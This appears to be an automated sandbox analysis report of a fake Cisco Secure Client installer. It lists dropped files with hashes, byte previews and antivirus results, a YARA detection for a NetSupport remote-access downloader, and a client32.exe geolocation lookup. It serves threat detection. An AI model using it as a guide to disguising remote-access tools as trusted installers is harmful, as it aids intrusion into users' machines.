                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):145512
                                                                                                                                      Entropy (8bit):6.622600549799495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:2lE8KKdwsPSfyPQ2TbpoEcRj+SOXzPsdGTE55vt67Ktb1sK8W77tHbloNeITqx/4:2q82KP9TbpoEI+Ew7Ktb1sKXblmeIkO
                                                                                                                                      MD5:E6FF7D48757F7470A8861AC3B3E159E6
                                                                                                                                      SHA1:3B2ED33F1025FB320D3C7D5699A941D94BBDC222
                                                                                                                                      SHA-256:74D0A04DED5E21F85BF32274823894AA5ACB9DDABE3D845F896E47521DEC2FE6
                                                                                                                                      SHA-512:312D1EDA0FAA80EC22AAD2CB660D611C1EE0207DCE84AB3A318B89CC7229993C518DDCE8B72D55A10FD85E392665394FAFEC6A320EFA84213A02360B49F8B1E1
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.}.=.......!.......).......).......1.......)...9...(...-...H...............,...-.y.,.......,...Rich-...........PE..L......d............................ ........0....@..........................@.......d....@.................................0...,.......................hH... .......c..T...................@e......Pd..@............0...............................text............................... ..`.rdata......0......................@..@.data... +..........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2392680
                                                                                                                                      Entropy (8bit):6.658300142387931
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:dFtYsvJwGcAhLrE0o5r+1mP/4qkxhDzMkfUg8Ul6:dFTNrEvmDzMkfP85
                                                                                                                                      MD5:208BC604DF1E3C9FF524C9AD9066E552
                                                                                                                                      SHA1:DC76F03E1A6851A8610FCA6A73EFCA567ADA84CB
                                                                                                                                      SHA-256:025635A4E805DA1241F752FE664C766B745C7F70DE070DC4AC87875D249150C5
                                                                                                                                      SHA-512:4A95407898D6EA16ED96208B9B94825091CA9E554A278654D71009AE04C695FEF3745BA3FF2DFFD5FF1C76DC62C58522300F0FD903F52F0A3E4F68DA5CE23892
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......t..0...0...0...9.w.$.......8...b...4...b...:...b...9...$...2.......2...b...,...e...4...$...-...0.......$...1..............1.......1...0.s.1.......1...Rich0...........PE..L.....d...........!.........d................................................$.......$...@A........................pm..D1....!......."..B...........:$.hH...."......D..T...................@E......`D..@............................................text...Z........................... ..`.rdata..............................@..@.data.........!.......!.............@....rsrc....B...."..D...n".............@..@.reloc........".......".............@..B................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):525928
                                                                                                                                      Entropy (8bit):6.663689707982956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:8zNdH+68U6BXsQex0xCC5pQEhRL/21VVirhVVVPlLIOqyRcCGlhl48MBAuh:WNxQBXsQ0K5pXPLeriPlLIOqpdvlo
                                                                                                                                      MD5:4CE708F0420389B058B7F2D74561A2C3
                                                                                                                                      SHA1:9ABCCDEB744DFFD374DF72117CC47C7D18EEF506
                                                                                                                                      SHA-256:382B6CD7055A36DECCAD2839EC47BFD49B1C4077EE5DFC9CB07C829A4CAAABBE
                                                                                                                                      SHA-512:53A0BC22C6772CB46DBB1CBE6BE2079AB620845CD0CB49FB4AFE7D8DC861D38351A4CE7226ADCCE70180F65AB112701F55F91AA438B018D6C370A4244FB943ED
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............f]..f]..f]...]..f]..]..f].b\..f].e\..f].g\..f].c\..f]p.g\..f].g\..f]..g\..f]..g]~.f]p.o\..f]p.f\..f]p..]..f]...]..f]p.d\..f]Rich..f]................PE..L......d...........!.........@......................................................N.....@A............................0............@...B..............hH......._...u..T...................@v......`u..@............................................text............................... ..`.rdata..............................@..@.data........ ......................@....rsrc....B...@...D..................@..@.reloc..._.......`...^..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4467816
                                                                                                                                      Entropy (8bit):6.598146073323608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:+QCnFew3oMj8NiqvOE41lDJO2Gi3VjGClUjtbnaC:+TeOLECDJrpVSZbL
                                                                                                                                      MD5:03615EEF106C5E54C5279B05A9686B9A
                                                                                                                                      SHA1:621C9AB49367298751EAAB0E0A29575327041729
                                                                                                                                      SHA-256:7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3
                                                                                                                                      SHA-512:BFB2ADE2B66B7CCD3E1CB9FCFAD2AF8D35BD12E063ECC1D388958C5A66776CC865CDD25B72B3786011C388C9A3FF730DAF5F97D58923829DA9DBC76AD393FCE8
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........d..............n.......n..q....jf......p.......p.......p.......n.......l...............p..Q....n..........p...|p..s...|pd.............|p......Rich....................PE..L......d..................)...................)...@..........................`D......YD...@...................................8.T.....:.X.............C.hH... B..6..0.6.T.....................6.......6.@.............)..............................text.....).......)................. ..`.rdata..fd....)..f....).............@..@.data.........9.......8.............@....rsrc...X.....:.. ....9.............@..@.reloc...6... B..8....A.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):660072
                                                                                                                                      Entropy (8bit):6.659866758160457
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:kSCossJt+kPCULOLT5xylm6hSCX+JGvP755x+RpUG1m3A0KmklXz0OH9IYW4U+1M:kbAJDOLT5po+kPARgA0KmuXz0OH9H3Ov
                                                                                                                                      MD5:5E4035EF3C0EEC7E49035F5DCD6054FF
                                                                                                                                      SHA1:633A4E83FF976CF041B65B7B6B1B54C697DAB0F5
                                                                                                                                      SHA-256:31F4F3D3A3F1E1761417FD9792B4151CD8C2724F2B83AD2C51C3E9A0D4D19BE4
                                                                                                                                      SHA-512:A0BA4A69A7D0EEDACC1F25361A69CA7D73CFC893632C1033858ED08BA2DEEED00592972BCB1FF6D075AFE5E8B64291F47A3E0FF6346CC3228A6C989DF10D857E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Rj...............sQ.....D~......D~......D~......D~.......~......b..<....`......C~..............~..-....~.......~=.......U......~......Rich....................PE..L......d...........!......................................................................@A............................<...,...T....p..................hH......L{...z..T...................@|......H{..@...............0............................text............................... ..`.rdata...K.......L..................@..@.data...@....P.......<..............@....rsrc........p.......F..............@..@.reloc..L{.......|...N..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):96872
                                                                                                                                      Entropy (8bit):6.7074578724573355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:khfMwC52VJJ1NkaqH1d+VvzNRqubyXCsMAvJxMnYTxB:wfRVJJ1NkaqHP+fRqpXCsMAvIy
                                                                                                                                      MD5:4A99D4199F25191F921F0EA08948FAED
                                                                                                                                      SHA1:C1EEDF728A46CCD4FE0897FAAC3B859941AAB81D
                                                                                                                                      SHA-256:3F78B54296FF87AEF6F0FCAC9DDFF1AD93A336AC4336D2C43CD57BEEA0E22065
                                                                                                                                      SHA-512:85753CE8051EFCB5F278A722CC34F1362EF0DA1AEE494D455EC8EDEF09FE81591A3D6EFF19D623C5B743E3CAE887DC5786805EBA527333CDAFC078A0A4291335
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E....{..{..{...~..{.S...{.S...{.S...{.S...{.....{.....{..{.{.....{......{..{z..{.....{.Rich.{.................PE..L.....d.....................|......p.............@..........................`......il....@..........................................@...............2..hH...P......8...T...............................@............................................text.............................. ..`.rdata...R.......T..................@..@.data...D....0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva-6.cat (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10484
                                                                                                                                      Entropy (8bit):7.081965462144553
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Xr1RLG32vJCEvyyKwnsFWQFl2j21EhqnajKs8E:lvrnsFR72qslGs8E
                                                                                                                                      MD5:38B464383C531FF40AD2538CF4442C25
                                                                                                                                      SHA1:899E6C26E8362C3811189977640D5B625B566CD9
                                                                                                                                      SHA-256:C130160691DA77B3AFD58E642A09439709C6B60729E6CFB06EE687A02B7E2A68
                                                                                                                                      SHA-512:407AD6D59035AC10A6CBEB368F72772A6CDBB889934BA4097046BD489CA5E36D4374E5C6655485AB28419D0EB45587C664E65113589E6131FB208D7ABDB4F885
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:0.(...*.H........(.0.(....1.0...`.H.e......0.....+.....7......0...0...+.....7......>.O.>I.......f..220217132307Z0...+.....7.....0...0....R4.4.2.B.1.1.8.F.3.7.D.A.5.5.C.9.2.3.A.D.2.E.4.9.7.C.F.2.B.2.6.E.2.9.5.0.2.F.4.D...1..A0>..+.....7...100....F.i.l.e........v.p.n.v.a.6.4.-.6...s.y.s...0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...1.,.2.:.6...3.,.2.:.1.0...0...0M..+.....7...1?0=0...+.....7...0...........0!0...+........D+..7.U.#..I|.n)P/M0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R8.4.B.B.1.C.E.C.D.D.3.8.F.D.2.0.3.D.2.E.E.9.6.9.1.9.0.2.C.3.F.C.C.B.D.E.D.3.6.6...1..50:..+.....7...1,0*...F.i.l.e........v.p.n.v.a.-.6...i.n.f...0E..+.....7...17050...+.....7.......0!0...+.............8. =..i.......f0L..+.....7...1>0<...O.S.A.t.t.r.......&2.:.6...1.,.2.:.6...3.,.2.:.1.0...0...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RB.B.A.C.C.3.7.6.5.1.5.D.4.1.0.F.C.4.9.7.C.A.B.1

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva-6.inf (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3233
                                                                                                                                      Entropy (8bit):5.341509881686345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:wYNZ3JpdhH+0dhH2EnEqZUmogaRvmL3dZMdr:wYH3JpdhH+0dhH/EqZUmoP+dZMdr
                                                                                                                                      MD5:0187FF566D704C12A49E4FBCE5E00C45
                                                                                                                                      SHA1:84BB1CECDD38FD203D2EE9691902C3FCCBDED366
                                                                                                                                      SHA-256:9EFBDCAD9BCD5A9B81AEA9B4643AD13799844117D8F41AA86882F808603037A2
                                                                                                                                      SHA-512:5C69EED3D00807A5ED8CB17981B23B50A4152E9044883DBB875011709C359CED146A83F740F0158E05C9C7ECE9AC52F5F9B15DE6128EE352A2424A7639708426
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:; vpnva-6.inf..;..; Cisco AnyConnect Virtual Miniport Adapter for Windows Setup File..;..; (c) Copyright 2004-2021 Cisco Systems, Inc.....[version]..Signature = "$Windows NT$"..Class = Net..ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}..Provider = %Cisco%..CatalogFile = vpnva-6.cat..DriverVer = 12/14/2021,4.10.05040.0....[Manufacturer]..%CISCO%..= Cisco, NTamd64....[ControlFlags]..ExcludeFromSelect = *....[Cisco]..%vpnva.DeviceDesc% = Cisco.ndi.NTx86, vpnva....[Cisco.NTamd64]..%vpnva.DeviceDesc64% = Cisco.ndi.NTamd64, vpnva....[Cisco.ndi.NTx86]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NCF_PHYSICAL..*IfType = 6 ; IF_TYPE_ETHERNET_CSMACD..*MediaType = 0 ; NdisMedium802_3..*PhysicalMediaType = 0 ; NdisPhysicalMediumUnspecified..AddReg...= Cisco.reg..CopyFiles..= Cisco.CopyFiles....[Cisco.ndi.NTamd64]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NC

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):54176
                                                                                                                                      Entropy (8bit):6.343089804418659
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:/eDOHgIUkjxLqAW2ltHbfvFSzNhQxVBqv5jJwPB2M:2KHgIUkjxLqAW2l5vFSzNiqv51m
                                                                                                                                      MD5:98B8845F3554BAD1329541D54EADD3F0
                                                                                                                                      SHA1:FDB21CC76F860AB39D265A01846C81A707078BBB
                                                                                                                                      SHA-256:506AB485FE0DA85C6DF6D0B7ABBAD412ACA6A8EB3F575DFC2C81662107054792
                                                                                                                                      SHA-512:12D14D027679FE76820148D51A9B8AEAF5D024C5D49A85238B2D70780D05F046EEAB1F7A7EC8E50EE64851E3D9033443FF64E01FBCA35AE1AE56E5D09F4BB8D3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y=MA8S.A8S.A8S.USR.D8S.A8R.l8S.USP.E8S.USW.D8S..M[.D8S..M..@8S..MQ.@8S.RichA8S.................PE..d......a.........."............................@....................................#M....`a................................................|...<.......H................!...... .......T..............................................x............................text...bu.......v.................. ..h.rdata..|............z..............@..H.data...............................@....pdata..............................@..HPAGE................................ ..`INIT................................ ..b.rsrc...H...........................@..B.reloc.. ...........................@..B................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):89192
                                                                                                                                      Entropy (8bit):7.008180217438666
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:YWM3/1/n8silQ0Fu/ILuhcWnToIfJ9IOlIOOCxf8z5xP9YFxKQ:Je/8hWiuwLuhPTBfJ3vOCxf8JvQ
                                                                                                                                      MD5:DDD6A5364B689408B502CA21276645E1
                                                                                                                                      SHA1:B9B7643A8ADC0C1C0170DEB4834079572A0EC8D5
                                                                                                                                      SHA-256:6613A22498BD14CD46AC678F7B50675A084CA04FA923FE8F6D731C1CB703C324
                                                                                                                                      SHA-512:26661FD5918F6FDBA5C08C260534E484DC1D79A45E4797E64482B7B2E2CA8EBA1B6427984CF6072C08D5A88A3CA154F7DD1DAE73E91CB5A1D80B85B9B3DE10AC
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)...)...)... .!.#...{..*...O.O.-...{.."...{..#...{..(...=...+...)..........&......(.....M.(...).%.(......(...Rich)...................PE..L......d...........!.........b...............................................P......2q....@A........................@...`............0..X...............hH...@......T...T...............................@............................................text...f........................... ..`.rdata..nQ.......R..................@..@.data........ ......................@....rsrc...X....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\is-VTFF8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3572797
                                                                                                                                      Entropy (8bit):6.528411015981411
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:iJYVM+LtVt3P/KuG2ONG9iqLRQf333f5vQ:zVL/tnHGYiql7
                                                                                                                                      MD5:8DC38914AFC0BAD9776A0E318423667E
                                                                                                                                      SHA1:C976BC170F196FF0B3AAB87A5C82B250FE3BA6CF
                                                                                                                                      SHA-256:169388D6EFFE87EF5194BFA85629C974A340C8FD30F5947983F4E6B1DC484F0F
                                                                                                                                      SHA-512:C42BF863FD45E5BD3443E7C7808B677D2F5B11C2C46917A5E9EC1E473065E85AEAB583FBB6D9F50BCAA4FBE34CCC09ACF7EEB26A27B7F9F73D7480E9C9036280
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..`........*.......*...@...........................7...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                      C:\Program Files (x86)\Cisco\unins000.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:InnoSetup Log Cisco Systems {EF90E41D-A35E-4C1A-83A3-7A15A5DFB72B}, version 0x418, 6157753 bytes, 305090\37\user\, C:\Program Files (x86)\Cisco\376\377\377\0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6157753
                                                                                                                                      Entropy (8bit):4.028727097017294
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:5eCH0IFlruozvPekdbzer0sHhsRirMlfXh2LhxpxRm:L
                                                                                                                                      MD5:918FCEF196D24572E4C2FC1825C1A104
                                                                                                                                      SHA1:E6ABD97ACA194E40D3BD67F1581364C31145B713
                                                                                                                                      SHA-256:EFCE16DB60323ACEE6B36443AD065348084495BB5391732178EAFB1DAC278345
                                                                                                                                      SHA-512:91EF2A01CB48171CA0C245EB0F6A05EE34BDE4DF51B9718B63B03E78FDEF3A750B1CB610C00E7F56119E2B1D05C689C56AB7C223DD73FA495D228D3458492D2F
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Cisco\unins000.dat, Author: Joe Security
                                                                                                                                      Preview:Inno Setup Uninstall Log (b)....................................{EF90E41D-A35E-4C1A-83A3-7A15A5DFB72B}}.........................................................................................Cisco Systems.......................................................................................................................X.....]..................................................................................................................7...................y........3.0.5.0.9.0......e.n.g.i.n.e.e.r......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o....................... .......\...T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u...........!MAIN....-1.v.

                                                                                                                                      C:\Program Files (x86)\Cisco\unins000.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3572797
                                                                                                                                      Entropy (8bit):6.528411015981411
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:iJYVM+LtVt3P/KuG2ONG9iqLRQf333f5vQ:zVL/tnHGYiql7
                                                                                                                                      MD5:8DC38914AFC0BAD9776A0E318423667E
                                                                                                                                      SHA1:C976BC170F196FF0B3AAB87A5C82B250FE3BA6CF
                                                                                                                                      SHA-256:169388D6EFFE87EF5194BFA85629C974A340C8FD30F5947983F4E6B1DC484F0F
                                                                                                                                      SHA-512:C42BF863FD45E5BD3443E7C7808B677D2F5B11C2C46917A5E9EC1E473065E85AEAB583FBB6D9F50BCAA4FBE34CCC09ACF7EEB26A27B7F9F73D7480E9C9036280
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*..`........*.......*...@...........................7...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cisco\Cisco Secure Client for Windows.lnk

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Nov 1 10:11:22 2024, mtime=Fri Nov 1 10:11:22 2024, atime=Tue Aug 15 15:45:32 2023, length=3058280, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1482
                                                                                                                                      Entropy (8bit):4.49729904029476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8mdWEVdOEa2dvBl3Qbs6DqOg/k83EA7A8Md/731d/kmfUUPPqygm:8mdJVdOH2fqVukmT7A8Md/z1d/kmMtyg
                                                                                                                                      MD5:418022EE9ECDF0084465CA5E95982D11
                                                                                                                                      SHA1:34631B49C05BCC141332DA5F198768A40040352E
                                                                                                                                      SHA-256:54F3A93BFC69ED4D2724C49323E29F449D868F11FACD2BCE12638ABF9826B04B
                                                                                                                                      SHA-512:CDC15713F240756EC7C3358FF566E54DA388EBA394C5DA5B08464E0968445B7EB3691D5F2A6C8F432629272F51378D6FFBF6CB33F38C23D04CC39E09A7B7227D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.... .......N,...X..N,.........h......................./....P.O. .:i.....+00.../C:\.....................1.....aY]Y..PROGRA~2.........O.IaY]Y....................V......OY.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....P.1.....aYjY..Cisco.<......aYjYaYjY....)......................wA.C.i.s.c.o.....p.1.....aYkY..CISCOS~1..X......aYjYaYkY....9.........................C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.....H.1.....aYlY..UI..6......aYlYaYlY...........................$..U.I.....`.2.h....W.. .csc_ui.exe..F......aYlYaYlY..............................c.s.c._.u.i...e.x.e.......m...............-.......l...........C........C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe..M.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o.\.C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.\.U.I.\.c.s.c._.u.i...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o.\.C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\loca[1].htm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):15
                                                                                                                                      Entropy (8bit):2.7329145639793984
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:QJgTG:QkG
                                                                                                                                      MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                                                                      SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                                                                      SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                                                                      SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:32.7767,-96.797

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1772
                                                                                                                                      Entropy (8bit):5.467257144692072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Qw1WSU4y4RQmFoUeWmfmZ9tlNWR831NTxy9001dqZ0:QyLHyIFKL3OZXW8noS01YZ0
                                                                                                                                      MD5:0BB3AD9F0073F53B183BFBA6ADC7337B
                                                                                                                                      SHA1:B30777E4EFEF6015A01F77A44E7D1BEBFB96B6DE
                                                                                                                                      SHA-256:9828666AE58B394E86856BE247F937276F6954B34CDDBA044F456CE7BF13DEFD
                                                                                                                                      SHA-512:BADE839362AD07AF504DDEAB2D43079CC6322D160173B49B3F13D0A70020C33BEF77C11FD8FE66A0BC1F8E57BB8C862432EE5516C4A48BCFF9E2A7DA6FD3E51D
                                                                                                                                      Malicious:false
